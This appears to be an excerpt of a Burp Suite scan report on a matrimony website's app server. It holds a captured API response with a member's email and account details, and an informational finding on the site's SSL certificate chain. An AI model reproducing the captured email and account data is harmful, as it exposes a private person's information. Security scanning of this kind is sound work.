{"RESPONSECODE":"1","ERRCODE":"0","GENDER":"M","MEMBERTYPE":"F","SENTACCESS":"N","MEMBERSHIPNAME":"","MEMBERST
ATUS":"0","MEMBEREMAIL":"bmtesting34@gmail.com","DAYSOFREGISTRATION":"232","VALIDDAYS":"0","EXPIRYDATE":"2020-05-08
12:22:59","NUMBEROFPAYMENTS":"2","AUTORENEWALSTATUS":"0","POSTFLAG":"0","PROFILECOMPVAL":"79","ENABLEDISCOVER":
"1","DSSIMAGE":"","D
...[SNIP]...
7. SSL certificate
Previous
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational.
Server certificate
w1.matrimony.com, *.assamesematrimony.com, *.assistedmatrimony.com, *.bengalimatrimony.com,
*.bharatmatrimony.com, *.elitematrimony.com, *.gujaratimatrimony.com, *.hindimatrimony.com,
*.kannadamatrimony.com, *.keralamatrimony.com, *.marathimatrimony.com, *.marwadimatrimony.com,
*.matrimony.com, *.matrimonycdn.com, *.matrimonycorp.com, *.oriyamatrimony.com, *.parsimatrimony.com,
*.punjabimatrimony.com, *.sindhimatrimony.com, *.tamilmatrimony.com, *.telugumatrimony.com,
Issued to:
*.urdumatrimony.com, assamesematrimony.com, assistedmatrimony.com, bengalimatrimony.com,
bharatmatrimony.com, elitematrimony.com, gujaratimatrimony.com, hindimatrimony.com, kannadamatrimony.com,
keralamatrimony.com, marathimatrimony.com, marwadimatrimony.com, matrimony.com, matrimonycdn.com,
matrimonycorp.com, oriyamatrimony.com, parsimatrimony.com, punjabimatrimony.com, sindhimatrimony.com,
tamilmatrimony.com, telugumatrimony.com, urdumatrimony.com
Issued by: GlobalSign RSA OV SSL CA 2018
Valid from: Thu Nov 21 15:47:02 IST 2019
Valid to: Sun Feb 06 13:06:04 IST 2022
Certificate chain #1
Issued to: GlobalSign RSA OV SSL CA 2018
Issued by: GlobalSign
Valid from: Wed Nov 21 05:30:00 IST 2018
Valid to: Tue Nov 21 05:30:00 IST 2028
Certificate chain #2
Issued to: GlobalSign
Issued by: GlobalSign
Valid from: Wed Mar 18 15:30:00 IST 2009
Valid to: Sun Mar 18 15:30:00 IST 2029
Issue background
SSL (or TLS) helps to protect the confidentiality and integrity of information in transit between the browser and server, and
to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate that is
valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these
requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.
It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections in
particular. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without
user detection even when a valid SSL certificate is used.
References
· SSL/TLS Configuration Guide
Vulnerability classifications
· CWE-295: Improper Certificate Validation
· CWE-326: Inadequate Encryption Strength
· CWE-327: Use of a Broken or Risky Cryptographic Algorithm
Report generated by Burp Suite web vulnerability scanner v1.7.35, at Tue May 19 23:30:27 IST 2020.